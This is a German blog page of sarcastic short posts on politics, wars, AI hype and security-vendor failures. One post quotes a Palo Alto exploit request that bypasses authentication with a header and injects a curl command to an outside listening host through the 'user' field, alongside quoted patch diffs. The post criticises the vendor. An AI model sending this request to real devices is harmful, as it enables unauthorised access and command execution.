Fefes Blog

Fragen? Antworten! Siehe auch: Alternativlos

Wed Nov 20 2024

• [l] Im Moment kursieren (natürlich!) Anschuldigungen des Wahlbetrugs in den USA.

  Hier ist der seriösere der offenen Briefe.

  Der Zug ist abgefahren. Biden und Harris hatten JAHRE Zeit, das Wahlsystem zu reformieren. Haben sie nicht gemacht. Weil sie dachten, vielleicht, dass ihnen das Herrschaftswissen selber mal nutzen würde.

  Geliefert wie bestellt. Ich habe kein Mitleid und keinen Drang da irgendwas aufgeklärt zu kriegen. Das war ihre Chance und sie haben es verkackt.

  So und nur so funktioniert Evolution. Wenn man sich aus verkacktem Verhalten wieder rausschleimen kann, funktioniert das nicht. Das muss tödlich sein und die nächste Generation hat dann hoffentlich was gelernt. Oder sie ereilt, genauso verdient, dasselbe Schicksal.

  Ich positioniere mich immer gerne so, dass ich danach Told You So sagen kann. Well... Told You So. Nein, ich werde euch jetzt nicht helfen, die Auswirkungen eures nicht auf mich hörens zu verringern.

• [l] Aus der beliebten Politikschule "jetzt ist auch egal", heute: Biden will der Ukraine noch schnell Anti-Personen-Minen liefern.

  Na? Krieg ich jetzt auch wieder Leserbriefe, dass die gar nicht wirklich geächtet sind?

• [l] Die CIA hat herausgefunden, dass ein Atomkrieg schlecht für die Wirtschaft wäre. (Danke, Philip)
• [l] Wieso hat Selenskyj eigentlich keinen Trump-Golfplatz in Kharkiv gebaut?

  Wir haben die besten Golfplätze! Mit den meisten Kratern, äh, Löchern!

• [l] Genau mein Humor: Trend Micros Deep Security Agent ermöglicht Einschleusen von Schadcode.

  Und alle so: NEIN!!!! DOCH!!! OOOOOH!!

  Immerhin ist die Benamung richtig. Es handelt sich um einen Agenten. Nur halt nicht für unsere Seite.

  Trend Micro bewirbt sich auch direkt auf einen Lame Excuse Award:

  Um die Lücke zu missbrauchen, benötigten Angreifer physischen oder Fernzugriff auf eine verwundbare Maschine, schränkt Trend Micro ein.

  Was genau schränkt das ein? LMAO (Danke, Magnus)
• [l] Diese Meldung funktioniert auf mehreren Ebenen.

  Die Deutsche Bank steigt bei "KI"-Startup Aleph Alpha ein, kauft Anteile von Frühinvestoren (d.h. kauft die VCs raus, die offenbar kapiert haben, dass dieser "KI"-Scheiß Bullshit ist und raus wollten).

  Das finde ich schonmal eine gute Nachricht, wenn die VCs um ihr Leben fürchten.

  Aber was will die Deutsche Bank mit "KI"? Nun, ...

  Das Institut nimmt auch an einem Projekt von Creance.ai teil – einer Kooperation von PwC Deutschland und Aleph Alpha, bei der untersucht wird, wie generative KI helfen kann, Compliance-Anforderungen effizienter zu bewältigen. Verträge mit Dienstleistern sollen im Einklang mit der EU-Verordnung DORA validiert werden.

  Da unseren Regulierern und Politikern in Sachen "was könnten wir mal besser machen" nichts einfällt außer "Hmm man könnte mehr Papierkram von den Firmen fordern", versinken die Firmen gerade alle in sinnlosem Papierkrieg und produzieren alle Palettenweise sinnlosen Text, den nie jemand lesen wird.

  Denn wer sollte das lesen? Die Regulierungsbehörden? Soviele Bürger gibt es in diesem Land nicht, die die alle einstellen müssten. Die Regulierer wissen das, die Firmen wissen das, und damit ist der Weg frei für: "KI" schreibt die sinnlosen Texte, die eh nie jemand lesen wird.

  Eine Erfolgsgeschichte! Ach was sage ich: Ein Exportschlager!!

  Denn Deutschland drückt diese Marktverzerrung (kleine Konkurrenten können sich den Scheiß nicht leisten, so garantiert die Politik das Überleben der Deutschen Bank und anderer Ineffizienzmaschinen) natürlich EU-weit durch. Die werden auch alle "KI" kaufen müssen. Warum also nicht bei uns?!

  Wenn es nicht so traurig wäre, könnte man die alle prima auslachen.

  Update: Ist ja gut. Ihr könnt mir zu schreiben aufhören, dass man halt eine "KI" anschaffen muss, um den "KI"-Compliance-Output zu lesen. Der Witz war implizit, denn eine "KI" ist ja keine Person. Das liest nach wie vor niemand.

• [l] OLG Schleswig-Holstein: Keine Social-Media-Sperre ohne vorherige Nutzeranhörung.

  Die Entscheidung wird wahrscheinlich klarer, wenn man guckt, um was für einen Beitrag es hier ging:

  Der Blockierte hatte das Ergebnis einer Kreistagswahl 2021 so kommentiert: "Die Deutschen sind sowas von krank. Deutschland hat fertig."

  Lol wat? Dafür sperrt Facebook Accounts und löscht unilateral Beiträge?!
• [l] All diese Palo Alto Exploits, das kann Fortinet nicht auf sich sitzen lassen!

  Chinese hackers exploit Fortinet VPN zero-day to steal credentials

  Und natürlich ist Fortinet genau so drauf wie der Rest der Industrie, wenn es um Bug-Fix-Geschwindigkeit geht.

  "Volexity reported this vulnerability to Fortinet on July 18, 2024, and Fortinet acknowledged the issue on July 24, 2024," explains the report.

  "At the time of writing, this issue remains unresolved and Volexity is not aware of an assigned CVE number."

  Aber Fortinet ist nicht Microsoft, also kolportiert die Presse nicht das übliche unerträgliche Gewinsel von Microsoft, dass hier unschuldige Kunden gefährdet würden und man doch Responsible Disclosure fordert. Da krieg ich jedesmal Zucken in der Faust, wenn ich das lese. Die Kunden werden ja nicht von der Disclosure gefährdet sondern von der beschissenen Produktqualität ihrer versifften Zulieferer. (Danke, Dino)
• [l] Hier kamen mehrere Leserbriefe rein, dass Streumunition ja nicht wirklich geächtet sei. Nur Länder, die nicht annahmen, dass sie demnächst Krieg führen werden, hätten sie geächtet. Und überhaupt, wieviel kann eine Ächtung schon wert sein, wenn China und Indien nicht dabei sind, die zusammen die Hälfte der Menschheit sind.

  Nun, nehmt nicht mein Wort, dass das geächtet ist. Nehmt das der ARD, wenn es um Russland ging.

  Diese Waffen sind durch internationale Verträge geächtet.

  Ach. Ach was. Aber wenn die Ukraine das einsetzt, ist es nicht geächtet, nehme ich an? Tolle Wurst. (Danke, Oliver)
• [l] Erinnert ihr euch an Südwestfalen-IT? Diesen kommunalen Dienstleister für die ganzen Kommunen in der Gegend? Der dann einen "Cybervorfall" hatte und dann monatelang nicht in der Lage war, wieder voll verfügbar zu sein?

  Da gibt es jetzt Folgen.

  Einem ehemaligen Geschäftsführer, der noch Gehalt kassierte, wurde gekündigt. Gegen weitere Mitarbeiter wurden Disziplinarmaßnahmen eingeleitet.

  Und, fast noch schockierender:

  Die bisherige Organisationsform mit einer "aufgeblähten" 119-köpfigen Verbandsversammlung und einem von Politikern dominierten Vorstand werde reformiert, heißt es. Künftig sollen mehr IT-Experten dem Gremium angehören.

  ACH. ACH WAS. Es ist jemandem aufgefallen, dass Politiker gar nichts können und man ihnen keine Verantwortung übergeben darf, schon gar nicht in Gesellschaften, die einen tatsächlichen Zweck erfüllen sollen und nicht nur Geld verbrennen dürfen wie Lotto und SPD-eigene Verlage? Das ist ja unglaublich!

  Gibt es etwa doch noch Hoffnung?

  Update: Wenn man genauer hinguckt, ist die Antwort natürlich: Nein, gibt es nicht. Denn keiner von denen musste in den Knast, keiner musste irgendwas zurückzahlen, im Gegenteil hat der eine Typ noch jahrelang Gehalt gekriegt, ohne dafür auch nur zur Arbeit erschienen zu sein. Wie das halt so ist, wenn "kommunale Dienstleister" mit abgehalfterten Politikern bestuhlt werden.

Tue Nov 19 2024

• [l] Wo wir gerade bei der Kategorie "genau mein Humor" waren: Ottawa paid nearly $670,000 for KPMG’s advice on cutting consultant costs. *Wieher* (Danke, Joshua)
• [l] Braucht ihr mal einen richtigen Bauchlacher? Die Meldung hier liefert.

  immerhin sei Windows 11 bereits "das sicherste Betriebssystem der Welt", wie die Ankündigung betont.

  BWAHAHAHA genau mein Humor!

  Und schließlich will Microsoft den Identitätsschutz verbessern, um Phishing-Angriffe zu verhindern.

  Der einzige, der alle eure Daten sehen können soll, soll Microsoft sein. Und ihr bezahlt noch dafür. Wie diese Mauer um Mexiko herum, falls ihr euch erinnert.
• [l] Das US-Justizministerium denkt laut darüber nach, Google zum Chrome-Verkaufen zu zwingen. Wegen Monopolmissbrauchs.

  Ich glaube nicht, dass das ernst gemeint ist. Ich glaube, das Kalkül lief etwa so: Biden ist eine lahme Ente, wir sind frisch abgewählt, und Trump hasst unsere Kumpels, die Tech Bros.

  Trump findet ja, dass die Social Networks und Suchmaschinen ihn unfair benachteiligt haben, indem sie seine Misinformationen zu bekämpfen und rauszufiltern versucht haben, und hat daher als neuen FCC-Chef (deren Kommunikations-Regulierer) diesen Spezialexperten ausgesucht, der von einem "Zensurkartell" spricht, das man jetzt zerschlagen müsse.

  Das ungerechte Zorn der Republikaner richtet sich vor allem gegen Facebook, aber auch gegen Google, wegen Suche und Youtube, wo Google bei Covid-Lügnern Hinweise eingeblendet hat, so man sich inhaltlich belastbarer informieren kann.

  Aus Sicht der untoten Democrats im abgewählten Justizministerium ist also absehbar, dass Trump die Tech-Riesen zerschlagen wird. Die Democrats wissen auch, dass Kartelle Scheiße sind, und wenn die Tech Bros nicht alle in Democrat-Hochburgen säßen und dort Arbeitsplätze schüfen, hätte man vielleicht auch schonmal etwas zu unternehmen versucht. Aber hey, wenn die eh demnächst geschlachtet werden, dann kann man wenigstens jetzt so tun, als sei man selbst der Auslöser gewesen, der hier Gerechtigkeit schafft. Denn das Narrativ ist den Democrats ja bereits ziemlich komplett entglitten an der Stelle. Google Search ist so schlecht geworden, dass Googles "das schadet dem Kunden" vor allem Gelächter auslöst.

• [l] Fallout: Japan eröffnet stark mit einer Jury-Rig-Gauss-Handgun (vergleiche: die Bastelkanone aus der Abe-Ermordung).
• [l] Läuft offenbar gut, der Fünffrontenkrieg Israels gerade. So gut, dass Artikel wie dieser in der Jerusalem Post veröffentlicht werden:

  Southern Lebanon is actually northern Israel - opinion

  Na dann können wir das ja bedenkenlos annektieren! (Danke, Felix)
• [l] Die ARD schreibt:

  ATACMS können mit Streumunition bestückt werden, die sich am Zielort in einem weiten Radius verteilt. International ist Streumunition höchst umstritten, weil sie wegen ihres Streufaktors auch Jahre nach einem militärischen Konflikt zu zivilen Opfern führen kann. Im Ukraine-Krieg wurde sie auch deshalb ausgeliefert, um den großen Vorsprung Russlands bei der Munitionsproduktion auszugleichen. Zudem kann Streumunition besonders effektiv gegen Truppen und ungepanzerte Fahrzeuge im offenen Gelände eingesetzt werden.

  Schade, dass die ARD sich kein Fact Checking leisten kann. Sonst hätte ihnen jemand mitgeteilt, dass Streumunition nicht "umstritten" sondern geächtet ist. Das ist ethisch so sonnenklar, dass sogar der Heilige Stuhl das ratifiziert hat. Selbst der Südsudan ist beigetreten. Aber die USA, Russland und die Ukraine haben nicht unterschrieben, genausowenig wie China und Israel, Indien und Pakistan. Selbst in der EU gibt es ein paar Gruselstaaten, die sich in Ethikfragen noch hinter dem Südsudan eingereiht haben: Finnland, Estland, Lettland, Polen, Rumänien und Griechenland. Eine Schande.

  Deutschland hat das unterschrieben und ratifiziert. Insofern bin ich irritiert, dass die ARD das jetzt als eine offene Streitfrage darstellt, ob man das einsetzen sollte oder nicht.

• [l] Hey, liebes BSI? Kurze Frage für einen Freund.

  Wieviele KRITIS-Organisationen setzen eigentlich Fortinet oder Palo Alto ein? Und sind damit durch diverse Audits und Pentests gekommen?

  Wir haben doch umfangreiche Dokumentationspflichten jetzt. Erzählt doch mal, wie gut die geholfen haben!

  Wie viele Firmen haben ISO-27001 und Fortinet/Palo Alto?

  Fällt euch selber was auf oder muss ich weiterreden?

  Update: Leserbrief:

  Ich arbeite in einem Kritis-Unternehmen (Strom). Habe heute im Flurfunk mitbekommen, dass wir in unserem neuen Rechenzentrum nicht mehr auf Fortinet setzen.

  Wir werden da etwas einsetzen von:

  Palo Alto

  Badumm Tsssss

  Ich persönlich wundere mich ja nicht, dass wir ständig gehackt werden. Ich wundere mich, dass wir nur so wenig gehackt werden. Das liegt wahrscheinlich daran, dass unsere Spezialexperten wegen des ganzen Checklistenballetts nicht bemerken, dass und wie lange und von wie vielen parallel sie schon kompromittiert wurden.

• [l] Ich habe vor einer Weile angefangen, Compliance-Bullshit als Kunstförderung zu bezeichnen, weil es halt reines Theater ist und nichts bringt.

  Jetzt überlege ich, ob ich nicht auch zu typischen Sicherheitslücken einfach Retrocomputing sagen sollte, weil das genau derselbe Scheiß ist, über den wir schon in den 1980er Jahren gelacht haben.

  Aktuelles Beispiel: Palo Alto. Ja, die schon wieder. SCHON WIEDER. Ich hab auch keinen Bock mehr.

  X-PAN-AUTHCHECK: off

  Ich wünschte, ich würde Witze machen.

  POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
  Host: {{Hostname}}
  X-PAN-AUTHCHECK: off
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 99
  
  user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

  Und was fiel da raus? Richtig! Eine gültige Session-ID!

  Die haben einfach ein diff gemacht von dem Patch, auf dem Palo Alto jetzt wochenlang saß, während ihre Kunden fröhliche exploitet wurden.

  +    $user = $_POST['user'];
  
  +    if (strlen($user) <= 63
  
  -            $_POST['user'],
  +            $user,

  Die neue Eingabevalidierung ist ... eine Längenbegrenzung. Nein, wirklich!

  Ich wünschte, ich würde Witze machen.

  -    return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");
  +    $u = $s->escapeshellarg($username);
  +    return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $u");

  Wisst ihr was? You had me at PHP. (via)
• [l] Wo wir gerade bei FDP und Verrat waren: "NIUS" (Achtung: Link geht zu "NIUS") ist entsetzt, dass eine FDP-Politikerin an Abmahnungen wegen Hate Speech im Internet mitverdient.

  Was?! Die FDP besteht aus windigen Geschäftemachern, deren Prinzipien nur vorgeschoben sind?! Das ist ja unglaublich, Bob! Hättet ihr mal die CDU gefragt, die wissen das schon länger!

  Dass diese FDP-betriebene Abmahnfirma auch noch neben CDU-Hasszerrbild Habeck auch noch Julia Klöckner (CDU!!!) zu ihren Kunden zählt, rundet das Schreckenslagebild ab.

  Update: Falls ihr "NIUS" nicht kennt: Das ist das neue Projekt von Ex-"Bild"-"Redakteur" Julian Reichelt, der ja auch wegen Verrats an Döpfner Ärger hatte. Da schließt sich der Kreis. Auch du, Brutus?

• [l] Setzt euch mal kurz stabil hin, damit ihr nicht aus dem Stuhl fallt.

  CDU-Politiker zweifeln an Verlässlichkeit der FDP.

  Nein, wirklich! Die Verlässlichkeit der FDP!!!

  FDP-Chef Christian Lindner komme ihm "mehr wie ein Spieler vor denn als ein verlässlicher Politiker", sagte der innenpolitische Sprecher der Unionsfraktion im Bundestag, Alexander Throm dem Magazin Stern. Der CDU-Politiker fügte hinzu: "Das einzige, auf was man sich bei Lindner verlassen kann, ist die Orientierung an den eigenen Interessen der FDP."

  CDU-Politiker (!) haben erkannt (!!), dass der Lindner nur seine eigene Karriere optimiert und dabei wie ein Zocker agiert.

  Ich weiß gar nicht, was mich daran mehr erschüttert. Dass jemand in der CDU etwas erkannt hat, oder dass sie das für ein Unterscheidungsmerkmal zwischen CDU und FDP halten.

  Ich finde das jedenfalls zum Brüllen komisch gerade.

  Tja, liebe FDP. Außerhalb der SPD gilt immer noch: „Alle lieben den Verrat, niemand liebt den Verräter“.

• [l] VW will ab Mitte 2025 in Hamburg autonome Sammeltaxis fahren lassen.

  Was meint ihr, können die nur autonom fahren oder erkennen die auch, wenn ihr Innenbereich von besoffenen Touristen vollgekotzt wurde?

• [l] Die G20-Staaten haben eine geniale Idee: Man könnte Superreiche mal wirksam besteuern.

  Wird natürlich nicht passieren, denn wo sollen dann die "Aufwandsentschädigungen" und "Wahlkampfspenden" für die Parteien herkommen.

• [l] Kann Palo Alto noch tiefer ins Klo greifen? Aber ja doch! Die Lücke, mit der seit Wochen ihre Kunden aufgemacht werden, die wollen sie jetzt selbst gefunden haben, und damit es nicht so übel aussieht, wie lange die auf dem Bug saßen, haben sie das Advisory auch vordatiert auf gestern, obwohl es das Advisory von vor zwei Wochen ist.

  Das war bestimmt ein bedauerlicher Softwarefehler oder so. Oder menschliches Versagen. Dafür sind Palo Alto ja Spezialisten.

  Auch dass da "Automatable: NO" steht ist glatt gelogen. Macht nur keiner, weil das einfach eine PHP-Seite ist, die das Admin-Passwort auf "palo alto" zurücksetzt, wenn ich das nicht mit einer anderen Palo-Alto-Lücke gerade verwechsele. Anderswo würde man das als Backdoor bezeichnen, nicht als "Lücke".

  Aber hey, was reg ich mich auf. Ihr werdet alle weiter bei denen kaufen, und die werden keinen Druck haben, bessere Produkte zu bauen.

  Das Hauptinteresse der Passanten gerade lässt sich offensichtlich befriedigen, indem man eine Liste von IPs als "IoC" verteilt. Wenn mir das vor 20 Jahren jemand als Scifi-Plot angeboten hätte, hätte ich ihn aus dem Raum gelacht.

  Update: Ich habe das mit dem anderen Palo-Alto-Müll verwechselt. Hier brauchte man mehrere trivial automatisierbare Schritte.

• [l] „Operationsplan Deutschland“ – Bundeswehr bereitet Unternehmen auf Kriegsfall vor.

  Es handelt sich, natürlich, um einen Stapel Papier, in der ersten Fassung ca 1000 Seiten lang.

  Primärquelle ist die FAZ, aber die hat sich ja mit ihrer Paywall selbst ins Aus geschossen, lizenziert aber ihre Inhalte an Microsoft, daher geht der Link oben zu MSN. Herzlichen Glückwunsch, FAZ. Geniale Strategie.

  Ich für meinen Teil bin erleichtert, dass die Bundeswehr immerhin noch Papier produzieren kann. Auch wenn das vermutlich McKinsey für sie gemacht haben wird.

  Was steht da so drin? Die FAZ zitiert einen brandheißen Tipp:

  „Bilden Sie auf hundert Mitarbeiter mindestens fünf zusätzliche Lkw-Fahrer aus, die Sie nicht benötigen“, lautet sein Vorschlag nach F.A.Z.-Informationen.

  Der Grund für die Maßnahme: „70 Prozent aller Lastwagen auf Deutschlands Straßen werden von Osteuropäern bewegt. Wenn dort Krieg ist, wo werden dann diese Leute sein?“

  Diese Scheiß Osteuropäer immer! Nur weil zuhause ein bisschen Krieg ist, vernachlässigen die ihre Pflichten uns gegenüber!? Alle ausweisen!1!!

  Scheiß Nordkoreaner immer! (Danke, Manuel)

Mon Nov 18 2024

• [l] Gute Nachrichten! USA und China: KI soll nicht über Einsatz von Atombomben entscheiden dürfen.
• [l] C-Lion ist beschädigt. Das ist ein wunderschöner Name für ein Untersee-Datenkabel zwischen Deutschland und Finnland, an dem sich Hetzner beteiligt hat, um deren RZ in Finnland gut anzubinden.

  Das Kabel lief wohl nahe der Nord Stream 2 Strecke und es gibt schon erste Sabotage-Spekulationen, weil Finnland ja in die Nato eingetreten ist.

  Update: Undersea cable between Lithuania and Sweden damaged. Es scheint sich um ein separates Kabel zu handeln.

• [l] Gute Nachrichten! Sie haben eine Anwendung für "KI"-Beschleuniger gefunden!

  Geräusch als Warnung: KI kann vorab vor explodierenden Akkus warnen

  Die Witze schreiben sich praktisch von selbst.
• [l] Wenn es um ausländische Firmen geht, sitzen bei unseren Gerichten die Macheten locker.

  Betroffene eines umfangreichen Datendiebstahls bei Facebook vor einigen Jahren haben nach einem Urteil des Bundesgerichtshofs (BGH) vergleichsweise niedrige Hürden, um Schadensersatz zu bekommen. Sie müssen nur nachweisen, dass sie Opfer des Vorfalls waren. Es sei weder nötig, dass die Daten nachweislich missbraucht wurden. Noch müssten die Betroffenen Belege dafür liefern, dass sie nun in besonderer Weise beeinträchtigt sind.

  Finde ich grundsätzlich gut. Hat kaum jemand mehr verdient als Facebook. Auf der anderen Seite: War das nicht ein Scraper? Erinnert sich da noch jemand? Das wäre nach meinem Rechtsverständnis nicht Facebooks Schuld, wenn du deine Daten bei denen hochlädst und andere sie dann halt automatisiert runterladen.

  Aber egal, was mich hier wirklich ärgert ist der Kontrast zu Modern Solutions, wo der Hersteller straffrei ausging und sie den Hacker verknackt haben, der den Bug gemeldet hat.

  Oh und natürlich zu den ganzen Ransomwarefällen, auch und speziell bei Behörden. Wieso habe ich als Bürger gegen die keine Schadensersatzpflichten analog dieser Regelung?

  Aber hey, Facebook sind Ausländer, bei denen kann man es ja machen. Sagt ein Gericht, dessen Justizministerium ein Microsoft-Cloud-Abo hat.

• [l] Die CSU möchte gerne den Präsidenten des Bayerischen Bauernverbandes zum Bundeslandwirtschaftsminister machen. (Kontext zum Bauernverband) (Danke, Constantin)
• [l] Brauchtumspflege ist ja gerade zur Weihnachtszeit wichtig für die Seele.

  Heute: In Russland stürzen jetzt nicht mehr nur Oppositionelle sondern auch Balletttänzer aus Fenstern.

• [l] Ich bereite ja gerade den Fnord-Jahresrückblick vor und gehe nochmal durch alle Blogmeldung des Jahres durch. Der Eindruck drängt sich geradezu auf, dass die Security-Firmen mich nötigen wollen, eine Kategorie für sie einzuführen.

  Das Problem habe ich leider jedes Jahr aber so schlimm wie diesmal war es noch nie. Und es hört auch nicht auf! Guckt euch nur mal Palo Alto an. So blöde ist ja hoffentlich keiner von euch, bei denen zu kaufen. Die Meldung da ist vom Juni.

  Die stellen also ihr "Expedition"-Produkt ein, das noch nie durch eine vertrauenswürdige Qualitätssimulation aufgefallen ist.

  Warum? Nun, das könnte etwas hiermit zu tun haben: auth bypass (schöner Writeup dazu) SQL Injection OS Command Injection.

  Ich applaudiere ja Palo Alto, dass sie erkennen, das ihr Produkt Schrott ist und weggeschmissen gehört. Das sollten viel mehr Hersteller machen. Aber wieso bei Expedition aufhören? PAN-OS hat genau solche Bugs auch gehabt. Von anderen Herstellern wie Fortinet oder Cisco mal ganz zu schweigen.

  Mich fragte heute jemand, ob die das abreißen, weil zu viele Bugs reinkamen, und sie daher gemerkt haben, wie schrottig das ist. Meiner Erfahrung nach wissen alle Hersteller, wie schlecht ihre Produkte sind. Einige wollen es auf Management-Schicht nicht wahrhaben, und ganz, GANZ selten gibt es auch Produkte, bei denen die Ingenieure nicht wissen, wie Scheiße ihr Produkt ist, aber das ist echt die Ausnahme. Habe ich in knapp 30 Berufsjahren zweimal erlebt. Die meisten Firmen wissen das, und die sehen das als Gelegenheit, mit Supportverträgen Profit zu machen.

  Häufig ist das so, dass ein Produkt ein Team hat, das über die Jahre technical debt aufgehäuft hat, und häufig geht der Verantwortliche dann, weil ein Mann von meiner Statur muss sich nicht mit brennenden Mülltonnen herumärgern, und der Rest des Teams erzählt mir beim Audit dann "das ist nicht mein Code, ich habe den bloß geerbt" (soll heißen: Ich habe keine Ahnung, was der tut, und traue mich nicht den anzufassen). Da kann ich echt die Uhr nach stellen bei Audits.

  Natürlich will niemand in den Rückbau von technical debt investieren, daher wird das immer teurer und träger und am Ende sitzt man Monate auf Bugfixes (das Palo-Alto-Dingens gerade wurde denen im Juni gemeldet). Und guckt euch mal an, was das für ein geiler Bug ist. Die haben da eine PHP-Datei, per Web erreichbar, die das Admin-Passwort auf "paloalto" zurücksetzt. Ohne Authentisierung, versteht sich. Kann man einfach aufrufen und ist Admin.

  Sorry, aber das ist kein "Bug". Das wusste die Firma auch, dass sie das haben. Dafür müsste in einer gerechten Welt jemand in den Knast.

  Übrigens, am Rande: Falls ihr euch dachtet, Programmierer würden doch von ihrer Ethik und ihrer guten Erziehung davon abgehalten, brennende Mülltonnen in der Landschaft zu verteilen, dann solltet ihr diesen Artikel lesen. Programmierer sind von allen Berufsgruppen die unethischsten. Alle haben ein schlechtes Gewissen und fühlen sich als Betrüger, wenn sie "KI" fragen und dann so tun als sei das ihre Arbeit gewesen. Außer Programmierern. Die finden das normal.

  Zentrale Gründe für das Unbehagen seien das Gefühl, Nutzung generativer KI fühle sich wie Mogeln an (47 Prozent), sowie Ängste, als weniger kompetent (46 Prozent) oder gar faul gesehen zu werden (46 Prozent).

  In Deutschland waren es hauptsächlich Nachrichten an Chef (31 Prozent) oder an Kollegen auf der gleichen Hierarchiestufe (27 Prozent), Leistungsbeurteilungen (24 Prozent) oder Ideen-Brainstormings (22 Prozent), bei denen Befragte keine KI-Nutzung eingestehen mochten. Sich beim Coden von der KI helfen zu lassen, wäre hingegen nur neun Prozent peinlich.

  Coder sind schlechte Menschen. Nur schlechte Menschen wie Scammer, Spammer, Marketing-Kokser und Coder lassen sich von "KI" helfen und haben kein schlechtes Gewissen.

Sun Nov 17 2024

• [l] Ah, endlich mal wieder Brauchtumspflege: Trump ernennt Fracking-Unternehmer zum Energieminister. Das ist noch nicht die Brauchtumspflege. Das hier ist die Brauchtumspflege:

  Als Politiker hat sich Chris Wright bisher nicht hervorgetan. Aber er hat mal Fracking-Flüssigkeit vor Kameras getrunken.

  Aber hey, wer weiß. Vielleicht hilft das gegen Hirnwürmer.

  Update: Ich habe mich ja gefragt, ob RFK vielleicht seine Impfleugnerei gerettet hat. Der fand ja Impfungen gefährlich und empfahl Ivermectin, was zwar nicht gegen Covid hilft aber ein Entwurmungsmittel ist.

• [l] Old and busted: Flugzeuge in Haiti beschossen.

  New hotness: Flugzeug in Dallas beschossen.

• [l] Wenn ihr zum 38C3 gehen wollt, dann könnt ihr jetzt das jährliche halfnarp-Ritual vollziehen und die Vorträge klicken, die ihr gucken wollt. Anhand der Klicks versucht die Orga dann die Vorträge so zu legen, dass so wenig Vorträge parallel liegen, die von denselben Leuten geguckt werden wollen.

  Außerdem ist das ein erster Blick darauf, welche Vorträge es ins Programm geschafft haben. Von mir ist der Fnord-Jahresrückblick dabei, dieses Jahr allerdings mit atoth statt mit Frank. Der musste leider kurzfristig zum "KI"-Training.

  Der beste Vortragstitel geht meiner Ansicht nach jedenfalls klar an "Der Thüring-Test für Wahlsoftware". Wunderbar!

• [l] Die Grünen küren Robert Habeck zum Kanzlerkandidaten.

  Hey wisst ihr noch letztes Mal? Als die die Baerbock zum Kanzler machen wollten? BWAHAHAHAHA

  Ich Völkerrecht, du Schweinebauer sage ich da nur.

  Immerhin, bei allem Geunke über die Grünen. Wenn die mit der Realität kollidieren, dann ändern sie ihre Strategie. Zum Vergleich: Die CDU hat den Merz aufgestellt.

  Die SPD hat noch nicht kapiert, dass sie mit der Realität kollidiert ist, und denkt immer noch über Cum-Ex-Olaf nach. Vielleicht wird's auch Pistorius, aber das ging eher von der Presse aus als von der SPD. Wie, ernsthaft? Ihr wollt nochmal die Schlaftablette aufstellen?!

• [l] Ich stolpere hier gerade zufällig über den Deutschen Ethikrat:

  Da der von der AfD vorgeschlagene und wegen der Ausstellung unrechtmäßiger Atteste zur Befreiung von der Maskenpflicht zu einer Bewährungsstrafe verurteilte Gynäkologe Ronald Weikl vom Bundestag abgelehnt wurde,[30] gehören dem Ethikrat statt 26 Mitgliedern nur 25 an:

  BWAHAHAHAHAHAHA
• [l] Aus aktuellem Anlass: Werdet Wahlhelfer. Ein Leser beschreibt den Vorgang:

  Man meldet sich dafür unbürokratisch. Voraussetzung ist, dass man volljährig und in Deutschland wahlberechtigt ist. Einfach "Wahlhelfer" und den Namen der eigenen Gemeinde googlen.

  Als Wahlhelfer ist man üblicherweise für eine 5h-Schicht vormittags oder eine zweite nachmittags im Wahllokal. Um 18:00 treffen sich alle Wahlhelfer beider Schichten, öffnen die Wahlurnen und zählen die Stimmen.

  Eine Bundestagswahl ist schnell ausgezählt und man ist inklusive Bürokratie gegen 21:00 oder früher fertig. Europa- und Regionalwahlen haben kompliziertere Wahlzettel und Zählverfahren, da kann es später werden.

  Man ist also am Wahltag einen 1/2 bis 3/4-Tag beschäftigt. Man kriegt einen kleinen Betrag, das sogenannte Erfrischungsgeld. Meine Gemeinde kümmert sich außerdem um Getränke und etwas Verpflegung für die Wahlhelfer, einmal brachten Wähler sogar Kuchen mit.

  Als Wahlhelfer tut man an einer zentralen Stelle etwas für die Demokratie und für die eigene Nachbarschaft. Es ist lehrreich und zumindest mir macht es sogar Spaß. Man verhindert damit Wahlcomputer, die immer wieder mit dem Mangel an freiwilligen Wahlhelfern herbeigeredet werden. Und, wie man in Berlin und auch in meiner Gemeinde sieht, man entlastet die Verwaltung, weil diese sonst ihre Mitarbeiter zwangsweise dafür abziehen muss.

  Das Erfrischungsgeld liegt im Moment in Berlin AFAIK bei sowas wie 100€, je nach dem, welche Funktionen man übernimmt, und es ist steuerfrei.